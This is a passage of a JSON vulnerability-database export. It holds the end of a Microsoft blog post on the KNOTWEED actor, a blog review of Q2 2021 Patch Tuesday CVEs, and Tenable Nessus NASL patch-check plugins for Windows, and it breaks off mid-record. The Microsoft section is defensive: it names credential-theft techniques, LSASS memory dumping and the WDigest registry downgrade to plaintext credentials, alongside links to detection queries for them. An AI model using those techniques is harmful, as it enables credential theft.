memory:\n\n<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/SecurityEvent/SuspectedLSASSDump.yaml>\n\n**Downgrade to plaintext credentials**\n\nThis query looks for the WDigest _UseLogonCredential_ registry value being set to 1, which enables plaintext credential storage:\n\n<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/SecurityEvent/WDigestDowngradeAttack.yaml>\n\n### Microsoft 365 Defender advanced hunting\n\nMicrosoft 365 Defender customers can run the following advanced hunting queries to locate IOCs and related malicious activity in their 
environments.\n\n**Microsoft Defender Antivirus detections related to KNOTWEED**\n\nThis query identifies detection of related malware and tools by Microsoft Defender Antivirus:\n\n<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Microsoft%20365%20Defender/Campaigns/KNOTWEED/KNOTWEED-AVDetections.yaml>\n\n**File hash IOCs related to KNOTWEED**\n\nThis query surfaces KNOTWEED file hash IOCs across Microsoft Defender for Endpoint tables:\n\n<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Microsoft%20365%20Defender/Campaigns/KNOTWEED/KNOTWEED-FileHashIOCsJuly2022.yaml>\n\n**Domain IOCs related to KNOTWEED**\n\nThis query identifies matches based on domain IOCs related to KNOTWEED against Microsoft Defender for Endpoint device network connections:\n\n<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Microsoft%20365%20Defender/Campaigns/KNOTWEED/KNOTWEED-DomainIOCsJuly2022.yaml>\n\n**COM registry key modified to point to Color Profile folder**\n\nThis query identifies modifications to COM registry keys to point to executable files in _C:\\Windows\\System32\\spool\\drivers\\color\\_:\n\n<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Microsoft%20365%20Defender/Campaigns/KNOTWEED/KNOTWEED-COMRegistryKeyModifiedtoPointtoColorProfileFolder.yaml>\n\n**PE file dropped in Color Profile folder**\n\nThis query looks for PE files being created in the _C:\\Windows\\System32\\spool\\drivers\\color\\_ folder:\n\n<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Microsoft%20365%20Defender/Campaigns/KNOTWEED/KNOTWEED-PEFileDroppedinColorProfileFolder.yaml>\n\n**Downloading new file using Curl**\n\nThis query looks for new files being downloaded using Curl:\n\n<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Microsoft%20365%20Defender/Campaigns/KNOTWEED/KNOTWEED-DownloadingnewfileusingCurl.yaml>\n\nThe post [Untangling KNOTWEED: European private-sector 
offensive actor using 0-day exploits](<https://www.microsoft.com/security/blog/2022/07/27/untangling-knotweed-european-private-sector-offensive-actor-using-0-day-exploits/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/security/blog>).", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-07-27T14:00:00", "type": "mssecure", "title": "Untangling KNOTWEED: European private-sector offensive actor using 0-day exploits", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-28550", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-36948", "CVE-2022-2204", "CVE-2022-22047"], "modified": "2022-07-27T14:00:00", "id": "MSSECURE:85647D37E79AFEF2BFF74B4682648C5E", "href": "https://www.microsoft.com/security/blog/2022/07/27/untangling-knotweed-european-private-sector-offensive-actor-using-0-day-exploits/", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "avleonov": [{"lastseen": "2021-07-28T14:34:07", "description": "Hello everyone! Let's now talk about Microsoft Patch Tuesday vulnerabilities for the second quarter of 2021. April, May and June. 
Not the most exciting topic, I agree. I am surprised that someone is reading or watching this. For me personally, this is a kind of tradition. Plus this is an opportunity to try Vulristics in action and find possible problems. It is also interesting to see what VM vendors considered critical back then and what actually became critical. I will try to keep this video short.\n\nFirst of all, let's take a look at the vulnerabilities from the April Patch Tuesday. 108 vulnerabilities, 55 of them are RCEs. Half of these RCEs (27) are weird RPC vulnerabilities. "Researcher who reported these bugs certainly found quite the attack surface". The most critical vulnerability is RCE in Exchange (CVE-2021-28480). This is not ProxyLogon, this is another vulnerability. ProxyLogon was in March. And this vulnerability is simply related to ProxyLogon, so it is believed that it is exploited in the wild as well. In second place is this Win32k Elevation of Privilege (CVE-2021-28310). It is clearly mentioned in several sources as being used in real attacks. "Bugs of this nature are typically combined with other bugs, such as a browser bug or PDF exploit, to take over a system". And the only vulnerability with a public exploit is the Azure DevOps Server Spoofing (CVE-2021-28459). Previously known as Team Foundation Server (TFS), Azure DevOps Server is a set of collaborative software development tools. It is hosted on-premises. Therefore, this vulnerability can be useful for attackers.\n\nLet's take a look at May. A very small Patch Tuesday. There are only 55 vulnerabilities. Vendors mainly wrote about the HTTP Protocol Stack Remote Code Execution Vulnerability. But no catastrophe happened. "tenable: On May 16, security researcher 0vercl0k published PoC code to github for CVE-2021-31166. Based on our analysis, this exploit could only result in a denial of service (DoS) condition". VM vendors also wrote a lot about the Hyper-V Remote Code Execution Vulnerability. 
But there was no real exploitation there either. But a real exploit appeared for Remote Code Execution in Microsoft SharePoint (CVE-2021-31181). And exploitation in the wild was mentioned for Windows Container Manager Service (CVE-2021-31167), which no VM vendor mentioned at all. But the exploitation was "Personally observed in an environment", so this may not be accurate. Also take a look at Memory Corruption in Microsoft Scripting Engine (CVE-2021-26419) with a public exploit and Information Disclosure in Windows Wireless Networking (CVE-2020-24587) with a sign of exploitation in the wild (but this also may not be accurate).\n\nAnd finally June. There are even fewer vulnerabilities, only 49. But there are a lot of them with a sign of exploitation in the wild. And this information is directly from Microsoft. Windows MSHTML Platform Remote Code Execution (CVE-2021-33742). Elevations of Privilege in Windows NTFS (CVE-2021-31956), Microsoft Enhanced Cryptographic Provider (CVE-2021-31199, CVE-2021-31201), Microsoft DWM Core Library (CVE-2021-33739). Windows Kernel Information Disclosure (CVE-2021-31955). Much more than usual. VM vendors have written the most about EoP in Windows NTFS (CVE-2021-31956). Do you know what vulnerability they didn't highlight at all? Elevations of Privilege and later Remote Code Execution in Windows Print Spooler (CVE-2021-1675). The one that started the PrintNightmare story. Very ironic. Also pay attention to Spoofing in Microsoft SharePoint (CVE-2021-31950) for which there is a public Server-Side Request Forgery exploit. 
VM vendors also did not write anything about this vulnerability in their reviews.\n\nFull Vulristics reports:\n\n * [ms_patch_tuesday_april2021_report_avleonov_comments.html](<https://avleonov.com/vulristics_reports/ms_patch_tuesday_april2021_report_avleonov_comments.html>)\n * [ms_patch_tuesday_may2021_report_avleonov_comments.html](<https://avleonov.com/vulristics_reports/ms_patch_tuesday_may2021_report_avleonov_comments.html>)\n * [ms_patch_tuesday_june2021_report_avleonov_comments.html](<https://avleonov.com/vulristics_reports/ms_patch_tuesday_june2021_report_avleonov_comments.html>)\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-10T00:14:59", "type": "avleonov", "title": "Vulristics: Microsoft Patch Tuesdays Q2 2021", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-24587", "CVE-2021-1675", "CVE-2021-26419", "CVE-2021-28310", "CVE-2021-28459", "CVE-2021-28480", "CVE-2021-31166", "CVE-2021-31167", "CVE-2021-31181", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-31950", "CVE-2021-31955", "CVE-2021-31956", "CVE-2021-33739", "CVE-2021-33742"], "modified": 
"2021-07-10T00:14:59", "id": "AVLEONOV:9D3D76F4CC74C7ABB8000BC6AFB2A2CE", "href": "http://feedproxy.google.com/~r/avleonov/~3/zKo35MmSBcA/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2023-02-16T14:28:10", "description": "The remote Windows host is missing security update 5003694. It is, therefore, affected by multiple vulnerabilities", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-08T00:00:00", "type": "nessus", "title": "KB5003694: Windows 7 and Windows Server 2008 R2 Security Update (June 2021)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-26414", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-31953", "CVE-2021-31954", "CVE-2021-31956", "CVE-2021-31958", "CVE-2021-31959", "CVE-2021-31962", "CVE-2021-31968", "CVE-2021-31971", "CVE-2021-31973", "CVE-2021-33742"], "modified": "2023-02-15T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_JUN_5003694.NASL", "href": "https://www.tenable.com/plugins/nessus/150368", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, 
Inc.\n\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(150368);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/02/15\");\n\n script_cve_id(\n \"CVE-2021-1675\",\n \"CVE-2021-26414\",\n \"CVE-2021-31199\",\n \"CVE-2021-31201\",\n \"CVE-2021-31953\",\n \"CVE-2021-31954\",\n \"CVE-2021-31956\",\n \"CVE-2021-31958\",\n \"CVE-2021-31959\",\n \"CVE-2021-31962\",\n \"CVE-2021-31968\",\n \"CVE-2021-31971\",\n \"CVE-2021-31973\",\n \"CVE-2021-33742\"\n );\n script_xref(name:\"MSKB\", value:\"5003667\");\n script_xref(name:\"MSKB\", value:\"5003694\");\n script_xref(name:\"MSFT\", value:\"MS21-5003667\");\n script_xref(name:\"MSFT\", value:\"MS21-5003694\");\n script_xref(name:\"IAVA\", value:\"2021-A-0280-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0279-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0032\");\n\n script_name(english:\"KB5003694: Windows 7 and Windows Server 2008 R2 Security Update (June 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5003694. 
It is, therefore, affected by multiple vulnerabilities\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5003694\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5003667\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update 5003694\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-31956\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-31962\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/06/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/06/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/06/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-06';\nkbs = make_list(\n '5003694',\n '5003667'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win7:'1') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'6.1', \n sp:1,\n rollup_date:'06_2021',\n bulletin:bulletin,\n rollup_kb_list:[5003694, 5003667])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-16T14:27:20", "description": "The remote Windows host is missing security update 5003635. 
It is, therefore, affected by multiple vulnerabilities", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-08T00:00:00", "type": "nessus", "title": "KB5003635: Windows 10 version 1909 Security Update (June 2021)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-26414", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-31951", "CVE-2021-31952", "CVE-2021-31954", "CVE-2021-31955", "CVE-2021-31956", "CVE-2021-31958", "CVE-2021-31959", "CVE-2021-31962", "CVE-2021-31968", "CVE-2021-31969", "CVE-2021-31970", "CVE-2021-31971", "CVE-2021-31972", "CVE-2021-31973", "CVE-2021-31974", "CVE-2021-31975", "CVE-2021-31976", "CVE-2021-31977", "CVE-2021-33739", "CVE-2021-33742"], "modified": "2023-02-15T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_JUN_5003635.NASL", "href": "https://www.tenable.com/plugins/nessus/150369", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. 
The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(150369);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/02/15\");\n\n script_cve_id(\n \"CVE-2021-1675\",\n \"CVE-2021-26414\",\n \"CVE-2021-31199\",\n \"CVE-2021-31201\",\n \"CVE-2021-31951\",\n \"CVE-2021-31952\",\n \"CVE-2021-31954\",\n \"CVE-2021-31955\",\n \"CVE-2021-31956\",\n \"CVE-2021-31958\",\n \"CVE-2021-31959\",\n \"CVE-2021-31962\",\n \"CVE-2021-31968\",\n \"CVE-2021-31969\",\n \"CVE-2021-31970\",\n \"CVE-2021-31971\",\n \"CVE-2021-31972\",\n \"CVE-2021-31973\",\n \"CVE-2021-31974\",\n \"CVE-2021-31975\",\n \"CVE-2021-31976\",\n \"CVE-2021-31977\",\n \"CVE-2021-33739\",\n \"CVE-2021-33742\"\n );\n script_xref(name:\"MSKB\", value:\"5003635\");\n script_xref(name:\"MSFT\", value:\"MS21-5003635\");\n script_xref(name:\"IAVA\", value:\"2021-A-0280-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0279-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0032\");\n\n script_name(english:\"KB5003635: Windows 10 version 1909 Security Update (June 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5003635. 
It is, therefore, affected by multiple vulnerabilities\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5003635\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update 5003635\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-31956\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-31962\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/06/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/06/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/06/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-06';\nkbs = make_list(\n '5003635'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10', \n sp:0,\n os_build: '18363',\n rollup_date:'06_2021',\n bulletin:bulletin,\n rollup_kb_list:[5003635])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-16T14:27:53", "description": "The remote Windows host is missing security update 5003637. 
It is, therefore, affected by multiple vulnerabilities", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-08T00:00:00", "type": "nessus", "title": "KB5003637: Windows 10 version 2004 / Windows 10 version 20H2 / Windows 10 version 21H1 Security Update (June 2021)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-26414", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-31951", "CVE-2021-31952", "CVE-2021-31954", "CVE-2021-31955", "CVE-2021-31956", "CVE-2021-31958", "CVE-2021-31959", "CVE-2021-31960", "CVE-2021-31962", "CVE-2021-31968", "CVE-2021-31969", "CVE-2021-31970", "CVE-2021-31971", "CVE-2021-31972", "CVE-2021-31973", "CVE-2021-31974", "CVE-2021-31975", "CVE-2021-31976", "CVE-2021-31977", "CVE-2021-33739", "CVE-2021-33742"], "modified": "2023-02-15T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_JUN_5003637.NASL", "href": "https://www.tenable.com/plugins/nessus/150370", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the 
Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(150370);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/02/15\");\n\n script_cve_id(\n \"CVE-2021-1675\",\n \"CVE-2021-26414\",\n \"CVE-2021-31199\",\n \"CVE-2021-31201\",\n \"CVE-2021-31951\",\n \"CVE-2021-31952\",\n \"CVE-2021-31954\",\n \"CVE-2021-31955\",\n \"CVE-2021-31956\",\n \"CVE-2021-31958\",\n \"CVE-2021-31959\",\n \"CVE-2021-31960\",\n \"CVE-2021-31962\",\n \"CVE-2021-31968\",\n \"CVE-2021-31969\",\n \"CVE-2021-31970\",\n \"CVE-2021-31971\",\n \"CVE-2021-31972\",\n \"CVE-2021-31973\",\n \"CVE-2021-31974\",\n \"CVE-2021-31975\",\n \"CVE-2021-31976\",\n \"CVE-2021-31977\",\n \"CVE-2021-33739\",\n \"CVE-2021-33742\"\n );\n script_xref(name:\"MSKB\", value:\"5003637\");\n script_xref(name:\"MSFT\", value:\"MS21-5003637\");\n script_xref(name:\"IAVA\", value:\"2021-A-0280-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0279-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0032\");\n\n script_name(english:\"KB5003637: Windows 10 version 2004 / Windows 10 version 20H2 / Windows 10 version 21H1 Security Update (June 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5003637. 
It is, therefore, affected by multiple vulnerabilities\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5003637\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update 5003637\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-31956\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-31962\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/06/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/06/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/06/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. 
